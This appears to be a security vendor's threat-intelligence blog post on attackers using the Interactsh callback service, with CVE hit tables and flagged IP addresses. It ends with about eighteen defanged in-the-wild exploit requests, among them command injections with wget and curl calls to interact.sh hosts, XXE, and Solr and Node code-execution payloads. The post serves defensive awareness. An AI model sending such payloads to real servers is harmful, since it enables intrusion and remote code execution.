This tool has already been actively used through ISP and company networks as early as April 18. We find that there are a lot of simple command injections through networks, which are related to specific CVEs. We observed a huge number of attempts, sent from a group of IP addresses and followed by the same URL, which do not seem to be a research project but rather a scanning event.
| CVE Number | Severity | Category | Hit Counts |
| CVE-2017-9506 | Medium | Server-Side Request Forgery (SSRF) | 1,132 |
| CVE-2017-12629 | Critical | Remote Code Execution | 663 |
| CVE-2019-2767 | High | Authentication Bypass (Insert Data) | 192 |
| CVE-2021-33544 | High | Remote Code Execution | 163 |
| CVE-2021-32819 | High | Remote Code Execution | 51 |
| CVE-2012-1301 | Critical | Server-Side Request Forgery (SSRF) | 13 |
| CVE-2018-1000600 | High | Server-Side Request Forgery (SSRF) | 11 |
| CVE-2021-27905 | Critical | Server-Side Request Forgery (SSRF) | 9 |
| CVE-2020-28188 | Critical | Remote Code Execution | 7 |
| CVE-2018-15517 | High | Server-Side Request Forgery (SSRF) | 6 |
| CVE-2009-4223 | N/A | PHP Remote File Inclusion | 5 |
| CVE-2019-18394 | Critical | Server-Side Request Forgery (SSRF) | 5 |
| CVE-2021-27886 | Critical | Remote Code Execution | 3 |
| CVE-2020-13379 | High | Server-Side Request Forgery (SSRF) | 2 |
Table 1. Interactsh exploit hit ranking by CVEs.
We collected data from URL Filtering with PAN-DB from March 7-Sept. 7 and recorded around 32,200 Interactsh hits. Focusing on vulnerability/exploit attempts, table 1 ranks the CVEs the observed traffic most commonly attempted to exploit. This means the actors behind the traffic are using Interactsh API tools to test whether their exploit attempts succeed. Each unique Interactsh URL can be thought of as a C2. Most of the exploits for the same CVEs are using multiple randomly generated Interactsh domains and scanning on different host sides.
| CVE Number | Severity | Category |
| CVE-2021-31755 | Critical | Remote Code Execution |
| CVE-2020-28871 | Critical | Remote Code Execution |
| CVE-2020-25223 | Critical | Remote Code Execution |
| CVE-2020-8813 | High | Remote Code Execution |
| CVE-2020-7247 | Critical | Remote Code Execution |
| CVE-2020-28188, CVE-2020-15568, CVE-2018-13354, CVE-2018-13338 | Critical | Remote Code Execution |
| CVE-2019-2616 | High | Authentication Bypass (Insert Data) |
| CVE-2018-16167 | High | Remote Code Execution |
| CVE-2018-14839 | Critical | Remote Code Execution |
| CVE-2016-1555 | Critical | Remote Code Execution |
Table 2. Other CVEs leveraged by Interactsh.
From our soak site (an internal network monitoring tool), we also captured some Interactsh activity, shown in Table 2, which could raise awareness of active exploits attempts.
Interactsh Activity Distribution
We also found several DNS queries using Interactsh from Cortex Xpanse data. We found three suspicious IP addresses.
82[.]112[.]184[.]197 is flagged as potential malware in VirusTotal, and 138[.]68[.]184[.]23 is a phishing site. We also found 82[.]112[.]184[.]206, flagged malicious. All three of these IP addresses have a large volume of Interactsh activity.
We analyzed all the exploits we observed that used the Interactsh tool, starting from the time it went public. Though the tool has been available online since April, we noted increasing usage of the tool in June.

Figure 5 shows the distribution of Interactsh activity in terms of more specific dates. Events shown on the chart could be an exploit or a single scanning action. The activity shown in Figure 5 corresponds with Figure 4, which shows increasing traffic in June.

Figure 6 shows DNS queries with the Interactsh link, distributed by location. The United Kingdom ranks No. 1, followed by Ecuador and the U.S., which rank No. 2 and No. 3.

Conclusion
Even though Interactsh can be used for legitimate purposes, it is widely used by attackers to test malicious traffic. Its testing traffic therefore could be followed by a series of exploits. The trend of using third-party open-source tools to test exploits has become more popular in the last few years. It is convenient for attackers to use open-source tools, and it is hard for defenders to simply block this traffic by services/IP/server etc. To help organizations defend against malicious exploits that originate this way, we need to raise awareness about the tool.
Palo Alto Networks Next-Generation Firewall customers who use Threat Prevention, Advanced URL Filtering, DNS Security and WildFire security subscriptions are protected against benign append attacks that use Interactsh. DNS Security has marked interact[.]sh as a malicious site.
We also recommend the following actions:
- Run a Best Practice Assessment to identify where your configuration could be altered to improve your security posture.
- Continuously update your Next-Generation Firewalls with the latest Palo Alto Networks Threat Prevention content (e.g. versions 8467 and above).
Use Case Examples: Exploits Leveraging Interactsh
hxxp[:]//ip-addr/uapi-cgi/certmngr[.]cgi?action=createselfcert&local=anything&country=aa&state=$(wget hxxp[:]//c44s021vkr17popa98agcrrhyneyyyd7c[.]interact.sh)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
(CVE-2021-33544)
hxxp[:]//ip-addr/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.github.config[.]githubtokencredentialscreator/createtokenbypassword?apiurl=hxxp[:]//c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr[.]interact.sh
(CVE-2018-1000600)
hxxp[:]//ip-addr/xmlpserver/convert?xml=<?xml+version="1.0"+?><!doctype+r+[<!element+r+any+><!entity+%+sp+system+"hxxp[:]//c38r5fq23aksk1ma690gcdmc6doyyahck[.]interact.sh/xxe.xml">%sp;%param1;]>&_xf=excel&_xl=123&template=123
(CVE-2019-2767)
hxxp[:]//ip-addr/solr/select?qt=/config#&&shards=127.0.0.1:8984/solq&stream.body={"add-listener":{"event":"postcommit","name":"nuclei","class":"solr.runexecutablelistener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","nslookup","$(whoami).c38at9vk6tb1j2mah7i0cdeca5yyybucs[.]interact.sh"]}}&wt=json&isshard=true&q=apple
hxxp[:]//ip-addr/search?q={!xmlparser v="<!doctype a system hxxp[:]//c3167tzyedf0000sfc2ggbo7zoeyyyyyp[.]interact.sh/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true""><a></a>"}
(CVE-2017-12629)
hxxp[:]//ip-addr/solr/db/replication?command=fetchindex&masterurl=hxxp[:]//c3167tzyedf0000sfc2ggboug8cyyyyyb[.]interact.sh:80/xxxx&wt=json&httpbasicauthuser=aaa&httpbasicauthpassword=bbb
(CVE-2021-27905)
hxxp[:]//ip-addr/?defaultFilter=e')); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('curl c32s61pbq16mga0vler0cdnhgbayyyyyn[.]interact.sh');
(CVE-2021-32819)
hxxp[:]//ip-addr/plugins/servlet/oauth/users/icon-uri?consumeruri=hxxp[:]//c33mg9s2ndhfbpsj7legcddsomayyyypg[.]interact.sh
(CVE-2017-9506)
hxxp[:]//ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq[.]interact.sh/port/80/secure
(CVE-2018-15517)
hxxp[:]//ip-addr/api/container/command?container=&command=;curl hxxp[:]//c44h3el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh
(CVE-2021-27886)
hxxp[:]//ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[.]interact.sh
(CVE-2020-13379)
hxxp[:]//ip-addr/adm/krgourl.php?document_root=hxxp[:]//c45luqovk0lir2vett1gcrf4iyayy468g[.]interact.sh
(CVE-2009-4223)
hxxp[:]//ip-addr/umbraco/feedproxy.aspx?url=hxxp[:]//c3qsfdg4hl24te8g7rc0cd9erqyygmui6[.]interact.sh
(CVE-2012-1301)
hxxp[:]//ip-addr/getfavicon?host=hxxp[:]//c3uhg4emp8vt8fqq370gcd6th6ayyy4b6[.]interact.sh
(CVE-2019-18394)


(CVE-2020-28188 CVE-2018-13354 CVE-2018-13338 CVE-2020-15568)
hxxp[:]//ip-addr/rest/sharelinks/1.0/link?url=hxxps[:]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w[.]interact.sh
hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]interact.sh';"
hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr[.]interact.sh
Text extracted automatically; images, tables and formatting may be missing. Original: https://unit42.paloaltonetworks.com/exploits-interactsh/

